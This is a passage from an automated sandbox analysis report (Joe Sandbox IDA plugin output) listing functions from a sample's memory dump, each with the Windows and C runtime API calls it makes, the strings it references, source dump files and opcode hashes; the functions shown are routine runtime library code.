MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00B7FE70
__alloca_probe_16.LIBCMT ref: 00B7FE9C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00B7FEDB
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B7FEF8
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B7FF37
__alloca_probe_16.LIBCMT ref: 00B7FF54
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00B7FF96
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00B7FFB9

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 7079d43d8ab42ac0c9db98795578c0df164ff37bae756fb7125bcce10fdfda6d
Instruction ID: 4241b93d01372f42703b401ebf83d7d39fd2f7e91ad3815dd32add53b2ea0ca9
Opcode Fuzzy Hash: 7079d43d8ab42ac0c9db98795578c0df164ff37bae756fb7125bcce10fdfda6d
Instruction Fuzzy Hash: DB516C7261121BABEB205F60CC45FBA7BE9EF41750F1484B5F929DA1A0DB708D10DB58

Function 00B8EE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B8EEFC

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction ID: 33e51135d0987bb2dddf7920b2e4689ba479f0d9c0daed22b5e17fa78c1af9f7
Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction Fuzzy Hash: B3B14372A00356AFEB11AF68CC81BBEBBE5EF55310F1441E5E954AB392D274DD01CBA0

Function 00B80D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B80D77
___except_validate_context_record.LIBVCRUNTIME ref: 00B80D7F
_ValidateLocalCookies.LIBCMT ref: 00B80E08
__IsNonwritableInCurrentImage.LIBCMT ref: 00B80E33
_ValidateLocalCookies.LIBCMT ref: 00B80E88

Strings

csm, xrefs: 00B80E1D

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5a43cd34d9e05310283b5a2e1c9957aaba1298f83070d00dbfaba41bbd6f9d14
Instruction ID: 8717e6ea77e043b5bf3b7afbbdf40292e8098966db9eaad1e85a0d42fa521f20
Opcode Fuzzy Hash: 5a43cd34d9e05310283b5a2e1c9957aaba1298f83070d00dbfaba41bbd6f9d14
Instruction Fuzzy Hash: 4741B030E10218ABCF10FF68C884A9EBBE5EF45355F1488E5E9145B272DB31AD19CB91

Function 00B80080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00B80086
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00B80094
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00B800A5

Strings

GetTempPath2W, xrefs: 00B8009A
GetSystemTimePreciseAsFileTime, xrefs: 00B8008E
kernel32.dll, xrefs: 00B80081

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: a71a4150e3c978c49d6a48e7eeb305120147c550a40e4cc24f6ca5a4497d59f7
Instruction ID: 16209d12b837029e04a9ec7043ee87a2646035d1b728ee183432b97f5a89858f
Opcode Fuzzy Hash: a71a4150e3c978c49d6a48e7eeb305120147c550a40e4cc24f6ca5a4497d59f7
Instruction Fuzzy Hash: A1D09E715492106F83105FB47D4A88A7FE9FA0B7213054192F445D3260FFB145108654

Function 00B94F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddf7c15de10401010af17af6d94ad4144a754c5e7a3f169c5fc2625a9b543364
Instruction ID: 21d839b9d657b7f4bc2a4d8b04c7a53c790ea403c065d0c07450d220fded52a3
Opcode Fuzzy Hash: ddf7c15de10401010af17af6d94ad4144a754c5e7a3f169c5fc2625a9b543364
Instruction Fuzzy Hash: 32B10870A48A499FDF22DFA8C881BADBBF0FF46314F1441E9E50197392DB719941CBA0

Function 00B79B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00B79C97
std::_Throw_Cpp_error.LIBCPMT ref: 00B79CA8
std::_Throw_Cpp_error.LIBCPMT ref: 00B79CBC
std::_Throw_Cpp_error.LIBCPMT ref: 00B79CDD
std::_Throw_Cpp_error.LIBCPMT ref: 00B79CEE
std::_Throw_Cpp_error.LIBCPMT ref: 00B79D06

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID:
API String ID: 2134207285-0
Opcode ID: 775f596849c55fc8acad2ac521ca5f3e68303647ba902356c78f7090303c10e6
Instruction ID: 137a12f0d15d063eb3af18924fca5e78fd92e4d7b576e370a53bd96196833876
Opcode Fuzzy Hash: 775f596849c55fc8acad2ac521ca5f3e68303647ba902356c78f7090303c10e6
Instruction Fuzzy Hash: 0041C3B1900B44CBDF309B648942BAFB7F4EF45320F1886ADD57E262D1D771A944CB52

Function 00B8ACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B8ACDE,00B80760,00B7B77F,6126FD41,?,?,?,?,00B9BFCA,000000FF), ref: 00B8ACF5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B8AD03
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B8AD1C
SetLastError.KERNEL32(00000000,?,00B8ACDE,00B80760,00B7B77F,6126FD41,?,?,?,?,00B9BFCA,000000FF), ref: 00B8AD6E

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9cf9f288aa16a2611eb9bff57afe138c010053188682af7ecca880576c0d8b36
Instruction ID: f557a4b014bfcab4231b974cfdcdc0af6482e5aae6b1e97c008323723f502e8f
Opcode Fuzzy Hash: 9cf9f288aa16a2611eb9bff57afe138c010053188682af7ecca880576c0d8b36
Instruction Fuzzy Hash: 3501487221A615AEBB243774BC86D6727D8EB02F7572402BBF630965F1EF514C42D381

Function 00B8B56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B8B68D
CallUnexpected.LIBVCRUNTIME ref: 00B8B906

Strings

csm, xrefs: 00B8B5AB
csm, xrefs: 00B8B618
csm, xrefs: 00B8B6C4

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 28ba51906b62c3958ab82609907b2227020a6b33b0e798fa6b4bc51fd8d8f24e
Instruction ID: 35b3bf55ff407237e86ff5ab80f612aff256e9cd77d2d46729d7d4d3190dce26
Opcode Fuzzy Hash: 28ba51906b62c3958ab82609907b2227020a6b33b0e798fa6b4bc51fd8d8f24e
Instruction Fuzzy Hash: 7CB11575800209EBCF19EFA4C881DAEBBF9FF54310B14459AE8156B222D731DA61DF92

Function 00B7BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00B7BF44
std::_Ref_count_base::_Decref.LIBCPMT ref: 00B7C028

Strings

csm, xrefs: 00B7BEB7
RCC, xrefs: 00B7BEAB
MOC, xrefs: 00B7BE9F

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: b7a3315b00b7ba9e475e62a1b6362327376491e744f18030cdacd6b666c646e9
Instruction ID: b22029087f5ea5cf1f277c27bbc5fcd463d5f29fbfdde962236ea7c6c2f6a513
Opcode Fuzzy Hash: b7a3315b00b7ba9e475e62a1b6362327376491e744f18030cdacd6b666c646e9
Instruction Fuzzy Hash: C6416975900205DFCF28EF68C945EAEB7F5EF48300B58C09DE469AB651C734AA45CF52

Function 00B855C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6126FD41,?,?,00000000,00B9BE94,000000FF,?,00B85685,00000002,?,00B85721,00B88396), ref: 00B855F9
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B8560B
FreeLibrary.KERNEL32(00000000,?,?,00000000,00B9BE94,000000FF,?,00B85685,00000002,?,00B85721,00B88396), ref: 00B8562D

Strings

CorExitProcess, xrefs: 00B85603
mscoree.dll, xrefs: 00B855F2

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d75dbbd5d3f9ffaa77c31c50975d2c33d2ea4820c936547971bbf20fd91ced74
Instruction ID: 574a41207d44988e3c1119c4ba337604b9d5cb9139bb7966ef8fe9e8837ac22a
Opcode Fuzzy Hash: d75dbbd5d3f9ffaa77c31c50975d2c33d2ea4820c936547971bbf20fd91ced74
Instruction Fuzzy Hash: 1A016271A44619AFDB119F54DC0AFAEB7F8FB05B25F040569F821A32A0EF749900CB90

Function 00B8D6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00B8D76F
__alloca_probe_16.LIBCMT ref: 00B8D838
__freea.LIBCMT ref: 00B8D89F

Part of subcall function 00B8BF11: RtlAllocateHeap.NTDLL(00000000,00B8DF35,?,?,00B8DF35,00000220,?,00000000,?), ref: 00B8BF43

__freea.LIBCMT ref: 00B8D8B2
__freea.LIBCMT ref: 00B8D8BF

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 81a1344120fb40f97d95457694709dd8876c0a3f3229348354f571684fed7e82
Instruction ID: c6ee30c39dceb20fe928e5d547768dc5389ba79f9a5086867d5ab992bc372da9
Opcode Fuzzy Hash: 81a1344120fb40f97d95457694709dd8876c0a3f3229348354f571684fed7e82
Instruction Fuzzy Hash: F2518172600206AFEB217F658C81EBB7BE9EF44750F1506AAFD14D62A1EB70DC50D7A0

Function 00B7EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B7F005
AcquireSRWLockExclusive.KERNEL32(00B78E38), ref: 00B7F024
AcquireSRWLockExclusive.KERNEL32(00B78E38,00B7A2F0,?), ref: 00B7F052
TryAcquireSRWLockExclusive.KERNEL32(00B78E38,00B7A2F0,?), ref: 00B7F0AD
TryAcquireSRWLockExclusive.KERNEL32(00B78E38,00B7A2F0,?), ref: 00B7F0C4

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: 3ab3cbcd111d529e32b4c0eec0b341db4dca4f01871fb97f097876861d51b3a8
Instruction ID: 295af59d2bfe57c9ff7e79965f31030b681c8232185d2668fa683284b9699d38
Opcode Fuzzy Hash: 3ab3cbcd111d529e32b4c0eec0b341db4dca4f01871fb97f097876861d51b3a8
Instruction Fuzzy Hash: BB414A7150060BDFCB20DF65C4819BAB3F5FF05311B5089BAE46A97A42DB30E985CB59

Function 00B73C70 Relevance: 7.6, APIs: 5, Instructions: 111COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B73CA5
std::_Lockit::_Lockit.LIBCPMT ref: 00B73CBF
std::_Lockit::~_Lockit.LIBCPMT ref: 00B73CE0
__Getctype.LIBCPMT ref: 00B73D92
std::_Lockit::~_Lockit.LIBCPMT ref: 00B73DD8

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
String ID:
API String ID: 3087743877-0
Opcode ID: 676402d103edd3e6727e5d446972abcea1245b1d865ace99eebf2a9a80625f8f
Instruction ID: cebebba7e3c8059af8b6b7092b8fa71904bca982821e600bcea9870c4c0dceef
Opcode Fuzzy Hash: 676402d103edd3e6727e5d446972abcea1245b1d865ace99eebf2a9a80625f8f
Instruction Fuzzy Hash: 07411871D002188FCB24DF94D845BAEBBF1FF85B20F1481A9D8296B391DB34AE41CB91

Function 00B7D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B7D4C9
std::_Lockit::_Lockit.LIBCPMT ref: 00B7D4D3
int.LIBCPMT ref: 00B7D4EA

Part of subcall function 00B7C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00B7C1F6
Part of subcall function 00B7C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00B7C210

codecvt.LIBCPMT ref: 00B7D50D
std::_Lockit::~_Lockit.LIBCPMT ref: 00B7D544

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
String ID:
API String ID: 3716348337-0
Opcode ID: cc113993799878b2a6256f949ab519f09325372f00670f3769b4818aa566b50b
Instruction ID: ce9a29609bf155946717f6d6d195583249f562d890a1cd2ec84ecdc946ce110b
Opcode Fuzzy Hash: cc113993799878b2a6256f949ab519f09325372f00670f3769b4818aa566b50b
Instruction Fuzzy Hash: B101C0319001158FCB05EBA4C812ABE7BF5AF84324F258599E43DAB282CF349E00CB92

Function 00B7ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B7ADDE
std::_Lockit::_Lockit.LIBCPMT ref: 00B7ADE9
std::_Lockit::~_Lockit.LIBCPMT ref: 00B7AE57

Part of subcall function 00B7ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00B7ACC2

std::locale::_Setgloballocale.LIBCPMT ref: 00B7AE04
_Yarn.LIBCPMT ref: 00B7AE1A

Memory Dump Source

Source File: 00000000.00000002.2033632117.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.2033618225.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033652754.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033667782.0000000000BAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033679161.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033691125.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033741023.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033809701.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 7ab513ff8c7e25070f40b9be3ba449141316658c1f9ff842aa707af97a27f72f
Instruction ID: 8170329d3533863cc5a2e2a47ed6a977cac1f17d7c7da5b8a96c8d516f5b96a0
Opcode Fuzzy Hash: 7ab513ff8c7e25070f40b9be3ba449141316658c1f9ff842aa707af97a27f72f
Instruction Fuzzy Hash: 8F0184756006119BCB46FB20D85697D7BF5FFC9750B188099E82A57381CF345E42CB86

Function 00B7B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00B7B809

Strings

